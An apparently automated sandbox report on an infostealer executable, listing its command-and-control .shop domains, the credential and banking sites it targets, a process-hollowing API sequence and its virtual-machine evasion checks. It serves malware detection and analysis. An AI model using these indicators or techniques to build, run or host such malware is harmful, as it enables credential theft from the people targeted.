https://fancywaxxers.shop/api
              Source: nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api7
              Source: nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiJ
              Source: nayfObR.exe, 00000003.00000003.2075834221.0000000005944000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075511997.0000000005943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiR3oR
              Source: nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apink
              Source: nayfObR.exe, 00000003.00000003.2064489964.0000000005928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apiok
              Source: nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apirV
              Source: nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/i
              Source: nayfObR.exe, nayfObR.exe, 00000003.00000003.2223148388.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210391409.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2101907540.00000000030A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api
              Source: nayfObR.exe, 00000003.00000003.2051055223.00000000030A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api9
              Source: nayfObR.exe, 00000003.00000002.2226400428.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2101907540.00000000030A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apiMicrosoft
              Source: nayfObR.exe, 00000003.00000003.2051055223.00000000030A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apis
              Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: nayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49716 version: TLS 1.2
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005B30100_2_005B3010
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005C00A20_2_005C00A2
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005AD9B20_2_005AD9B2
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005A92AB0_2_005A92AB
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005BE38E0_2_005BE38E
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_031087B83_3_031087B8
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_031087B83_3_031087B8
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_031087B83_3_031087B8
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_031087B83_3_031087B8
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: String function: 005A97C0 appears 47 times
              Source: nayfObR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: nayfObR.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003366411102483
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5536:120:WilError_03
              Source: C:\Users\user\Desktop\nayfObR.exeCommand line argument: M[0_2_005B4D40
              Source: nayfObR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\nayfObR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: nayfObR.exe, 00000003.00000003.2052125929.00000000058BA000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2052013928.00000000058D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: nayfObR.exeVirustotal: Detection: 44%
              Source: nayfObR.exeReversingLabs: Detection: 39%
              Source: C:\Users\user\Desktop\nayfObR.exeFile read: C:\Users\user\Desktop\nayfObR.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\nayfObR.exe "C:\Users\user\Desktop\nayfObR.exe"
              Source: C:\Users\user\Desktop\nayfObR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\nayfObR.exeProcess created: C:\Users\user\Desktop\nayfObR.exe "C:\Users\user\Desktop\nayfObR.exe"
              Source: C:\Users\user\Desktop\nayfObR.exeProcess created: C:\Users\user\Desktop\nayfObR.exe "C:\Users\user\Desktop\nayfObR.exe"Jump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: nayfObR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: nayfObR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: nayfObR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: nayfObR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: nayfObR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005A997A push ecx; ret 0_2_005A998D
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_0311CFFB push A0800095h; iretd 3_3_0311D001
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_03139E13 pushad ; retf 3_3_03139E21
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_03139E13 pushad ; retf 3_3_03139E21
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_03137383 pushad ; retf 3_3_03137385
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_03137383 pushad ; retf 3_3_03137385
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_0310708C push esi; retf 3_3_0310708F
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_0310708C push esi; retf 3_3_0310708F
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_031053EF push esi; retf 3_3_031053F2
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_031053EF push esi; retf 3_3_031053F2
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_030ACF5C push 68030ACFh; iretd 3_3_030ACF6D
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_03139E13 pushad ; retf 3_3_03139E21
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_03139E13 pushad ; retf 3_3_03139E21
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_03137383 pushad ; retf 3_3_03137385
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_03137383 pushad ; retf 3_3_03137385
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_0310708C push esi; retf 3_3_0310708F
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_0310708C push esi; retf 3_3_0310708F
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_031053EF push esi; retf 3_3_031053F2
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 3_3_031053EF push esi; retf 3_3_031053F2
              Source: C:\Users\user\Desktop\nayfObR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\nayfObR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\nayfObR.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exe TID: 6156Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005BB099 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_005BB099
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005BAFE8 FindFirstFileExW,0_2_005BAFE8
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: nayfObR.exe, 00000003.00000003.2064969547.0000000005954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: nayfObR.exe, nayfObR.exe, 00000003.00000003.2210391409.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2102040134.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223148388.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2220700165.000000000308C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.000000000308C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: nayfObR.exe, 00000003.00000003.2064969547.0000000005954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: nayfObR.exe, 00000003.00000003.2065093785.00000000058E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\nayfObR.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005A9643 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005A9643
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005D019E mov edi, dword ptr fs:[00000030h]0_2_005D019E
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005A1C80 mov edi, dword ptr fs:[00000030h]0_2_005A1C80
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005B6920 GetProcessHeap,0_2_005B6920
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005A9283 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005A9283
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005A9643 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005A9643
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005B1630 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005B1630
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005A9637 SetUnhandledExceptionFilter,0_2_005A9637

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: 0_2_005D019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_005D019E
              Source: C:\Users\user\Desktop\nayfObR.exeMemory written: C:\Users\user\Desktop\nayfObR.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
              Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
              Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
              Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
              Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
              Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
              Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
              Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
              Source: nayfObR.exe, 00000000.00000002.2031155271.000000000370F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fancywaxxers.shop
              Source: C:\Users\user\Desktop\nayfObR.exeProcess created: C:\Users\user\Desktop\nayfObR.exe "C:\Users\user\Desktop\nayfObR.exe"Jump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: GetLocaleInfoW,0_2_005BA8F0
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: EnumSystemLocalesW,0_2_005BA883
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: EnumSystemLocalesW,0_2_005BA9C5
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: EnumSystemLocalesW,0_2_005B61FD
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: GetLocaleInfoW,0_2_005BAA10
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_005BAAB7
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_005BA337
              Source: C:\Users\user\Desktop\nayfObR.exeCode function: GetLocaleInfoW,0_2_005BABBD
